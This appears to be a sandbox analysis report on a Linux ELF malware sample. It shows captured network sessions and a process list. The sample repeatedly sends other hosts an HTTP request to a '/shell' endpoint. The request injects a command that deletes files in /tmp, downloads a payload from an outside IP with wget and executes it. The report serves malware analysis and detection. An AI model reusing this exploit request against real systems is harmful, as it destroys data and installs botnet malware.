                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:42.952063084 CET307INHTTP/1.1 400 Bad Request
                                                          Server: nginx
                                                          Date: Tue, 02 Jan 2024 05:25:42 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 150
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          638192.168.2.235329445.91.92.17580
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:42.747930050 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:42.997489929 CET320INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.18.0
                                                          Date: Tue, 02 Jan 2024 05:25:42 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 153
                                                          Connection: keep-alive
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          639192.168.2.234206683.148.198.4480
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:42.757623911 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:43.020127058 CET904INHTTP/1.1 404 Not Found
                                                          Date: Tue, 02 Jan 2024 05:25:44 GMT
                                                          Server: Apache/2.4.17 (Win32) OpenSSL/1.0.2d PHP/5.5.30
                                                          Vary: accept-language,accept-charset
                                                          Accept-Ranges: bytes
                                                          Connection: close
                                                          Content-Type: text/html; charset=utf-8
                                                          Content-Language: en
                                                          Expires: Tue, 02 Jan 2024 05:25:44 GMT
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 70 6f 73 74 6d 61 73 74 65 72 40 6c 6f 63 61 6c 68 6f 73 74 22 20 2f 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 2f 2a 2d 2d 3e 3c 21 5b 43 44 41 54 41 5b 2f 2a 3e 3c 21 2d 2d 2a 2f 20 0d 0a 20 20 20 20 62 6f 64 79 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7d 0d 0a 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 43 43 3b 20 7d 0d 0a 20 20 20 20 70 2c 20 61 64 64 72 65 73 73 20 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 33 65 6d 3b 7d 0d 0a 20 20 20 20 73 70 61 6e 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 73 6d 61 6c 6c 65 72 3b 7d 0d 0a 2f 2a 5d 5d 3e 2a 2f 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21
                                                          Data Ascii: <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"><head><title>Object not found!</title><link rev="made" href="mailto:postmaster@localhost" /><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p, address {margin-left: 3em;} span {font-size: smaller;}/*...*/--></style></head><body><h1>Object not found!
                                                          Jan 2, 2024 06:25:43.020263910 CET475INData Raw: 3c 2f 68 31 3e 0d 0a 3c 70 3e 0d 0a 0d 0a 0d 0a 20 20 20 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0d 0a 0d 0a 20 20 0d 0a 0d 0a 20 20 20 20 49
                                                          Data Ascii: </h1><p> The requested URL was not found on this server. If you entered the URL manually please check your spelling and try again. </p><p>If you think this is a server error, please contactthe <a hre


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          640192.168.2.2335820210.136.185.6480
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:42.761377096 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:43.035610914 CET277INHTTP/1.1 404 Not Found
                                                          Date: Tue, 02 Jan 2024 05:25:42 GMT
                                                          Server: Apache
                                                          Content-Length: 65
                                                          Keep-Alive: timeout=3, max=100
                                                          Connection: Keep-Alive
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e
                                                          Data Ascii: <h1>Not Found</h1>The requested URL was not found on this server.


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          641192.168.2.2341670209.51.136.5580
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:42.872170925 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:43.019531012 CET430INHTTP/1.1 400 Bad Request
                                                          Date: Tue, 02 Jan 2024 05:25:42 GMT
                                                          Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                          Content-Length: 226
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          642192.168.2.233771043.192.122.6580
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:42.873893023 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:43.248955965 CET321INHTTP/1.1 400 Bad Request
                                                          Server: nginx/1.22.1
                                                          Date: Tue, 02 Jan 2024 05:25:43 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 157
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.22.1</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          643192.168.2.2354248115.110.175.3680
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:42.911184072 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          644192.168.2.234736623.3.111.16180
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:43.020356894 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:43.254853010 CET430INHTTP/1.0 400 Bad Request
                                                          Server: AkamaiGHost
                                                          Mime-Version: 1.0
                                                          Content-Type: text/html
                                                          Content-Length: 208
                                                          Expires: Tue, 02 Jan 2024 05:25:43 GMT
                                                          Date: Tue, 02 Jan 2024 05:25:43 GMT
                                                          Connection: close
                                                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 65 35 38 30 33 31 37 26 23 34 36 3b 31 37 30 34 31 37 33 31 34 33 26 23 34 36 3b 33 63 38 61 62 39 35 64 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                          Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;e580317&#46;1704173143&#46;3c8ab95d</BODY></HTML>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          645192.168.2.234767446.4.102.25280
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:43.105983019 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:43.347641945 CET292INHTTP/1.1 301 Moved Permanently
                                                          Date: Tue, 2 Jan 2024 05:28:43 GMT
                                                          Location: https://127.0.0.1/shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws
                                                          Connection: close
                                                          Content-Type: text/html
                                                          Content-Length: 56
                                                          Data Raw: 3c 48 54 4d 4c 3e 3c 42 4f 44 59 3e 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 48 31 3e 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e
                                                          Data Ascii: <HTML><BODY><H1>301 Moved Permanently</H1></BODY></HTML>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          646192.168.2.233559618.182.204.24280
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:43.130381107 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:43.396053076 CET401INHTTP/1.1 301 Moved Permanently
                                                          Server: awselb/2.0
                                                          Date: Tue, 02 Jan 2024 05:25:43 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 134
                                                          Connection: keep-alive
                                                          Location: https://127.0.0.1:443/shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          647192.168.2.235871461.221.104.22880
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:43.149492025 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:44.610019922 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          648192.168.2.2337024198.44.232.13880
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:43.163000107 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          649192.168.2.234018434.160.79.11980
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:43.999253035 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:44.121140003 CET441INHTTP/1.0 400 Bad Request
                                                          Content-Type: text/html; charset=UTF-8
                                                          Referrer-Policy: no-referrer
                                                          Content-Length: 273
                                                          Date: Tue, 02 Jan 2024 05:25:44 GMT
                                                          Data Raw: 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 74 65 78 74 3d 23 30 30 30 30 30 30 20 62 67 63 6f 6c 6f 72 3d 23 66 66 66 66 66 66 3e 0a 3c 68 31 3e 45 72 72 6f 72 3a 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 68 32 3e 59 6f 75 72 20 63 6c 69 65 6e 74 20 68 61 73 20 69 73 73 75 65 64 20 61 20 6d 61 6c 66 6f 72 6d 65 64 20 6f 72 20 69 6c 6c 65 67 61 6c 20 72 65 71 75 65 73 74 2e 3c 2f 68 32 3e 0a 3c 68 32 3e 3c 2f 68 32 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <html><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><title>400 Bad Request</title></head><body text=#000000 bgcolor=#ffffff><h1>Error: Bad Request</h1><h2>Your client has issued a malformed or illegal request.</h2><h2></h2></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          650192.168.2.235880443.175.236.10280
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:44.028517008 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:44.179508924 CET165INHTTP/1.1 418 Unknown Status
                                                          Content-Length: 0
                                                          Connection: close
                                                          Server: TencentEdgeOne
                                                          EO-LOG-UUID: 12646862562785884695
                                                          Date: Tue, 02 Jan 2024 05:25:44 GMT
                                                          Jan 2, 2024 06:25:44.258384943 CET1INData Raw: 0d
                                                          Data Ascii:


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          651192.168.2.235780874.217.134.1180
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:44.030944109 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          652192.168.2.2349264211.251.235.10580
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:44.278757095 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          653192.168.2.233783643.192.122.6580
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:44.376815081 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:44.754182100 CET321INHTTP/1.1 400 Bad Request
                                                          Server: nginx/1.22.1
                                                          Date: Tue, 02 Jan 2024 05:25:44 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 157
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.22.1</center></body></html>


                                                          System Behavior

                                                          Start time (UTC):05:23:40
                                                          Start date (UTC):02/01/2024
                                                          Path:/tmp/if33NMq1O2.elf
                                                          Arguments:/tmp/if33NMq1O2.elf
                                                          File size:4379400 bytes
                                                          MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e

                                                          Start time (UTC):05:23:40
                                                          Start date (UTC):02/01/2024
                                                          Path:/tmp/if33NMq1O2.elf
                                                          Arguments:-
                                                          File size:4379400 bytes
                                                          MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e

                                                          Start time (UTC):05:23:40
                                                          Start date (UTC):02/01/2024
                                                          Path:/tmp/if33NMq1O2.elf
                                                          Arguments:-
                                                          File size:4379400 bytes
                                                          MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e

                                                          Start time (UTC):05:23:40
                                                          Start date (UTC):02/01/2024
                                                          Path:/tmp/if33NMq1O2.elf
                                                          Arguments:-
                                                          File size:4379400 bytes
                                                          MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e

                                                          Start time (UTC):05:24:20
                                                          Start date (UTC):02/01/2024
                                                          Path:/tmp/if33NMq1O2.elf
                                                          Arguments:-
                                                          File size:4379400 bytes
                                                          MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e
                                                          Start time (UTC):05:23:40
                                                          Start date (UTC):02/01/2024
                                                          Path:/tmp/if33NMq1O2.elf
                                                          Arguments:-
                                                          File size:4379400 bytes
                                                          MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e
                                                          Start time (UTC):05:23:40
                                                          Start date (UTC):02/01/2024
                                                          Path:/tmp/if33NMq1O2.elf
                                                          Arguments:-
                                                          File size:4379400 bytes
                                                          MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e
                                                          Start time (UTC):05:23:40
                                                          Start date (UTC):02/01/2024
                                                          Path:/tmp/if33NMq1O2.elf
                                                          Arguments:-
                                                          File size:4379400 bytes
                                                          MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e

                                                          Start time (UTC):05:23:41
                                                          Start date (UTC):02/01/2024
                                                          Path:/usr/bin/xfce4-panel
                                                          Arguments:-
                                                          File size:375768 bytes
                                                          MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                                                          Start time (UTC):05:23:41
                                                          Start date (UTC):02/01/2024
                                                          Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                                                          Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libsystray.so 6 12582920 systray "Notification Area" "Area where notification icons appear"
                                                          File size:35136 bytes
                                                          MD5 hash:ac0b8a906f359a8ae102244738682e76

                                                          Start time (UTC):05:23:41
                                                          Start date (UTC):02/01/2024
                                                          Path:/usr/bin/xfce4-panel
                                                          Arguments:-
                                                          File size:375768 bytes
                                                          MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                                                          Start time (UTC):05:23:41
                                                          Start date (UTC):02/01/2024
                                                          Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                                                          Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libstatusnotifier.so 7 12582921 statusnotifier "Status Notifier Plugin" "Provides a panel area for status notifier items (application indicators)"
                                                          File size:35136 bytes
                                                          MD5 hash:ac0b8a906f359a8ae102244738682e76

                                                          Start time (UTC):05:23:41
                                                          Start date (UTC):02/01/2024
                                                          Path:/usr/bin/xfce4-panel
                                                          Arguments:-
                                                          File size:375768 bytes
                                                          MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                                                          Start time (UTC):05:23:41
                                                          Start date (UTC):02/01/2024
                                                          Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
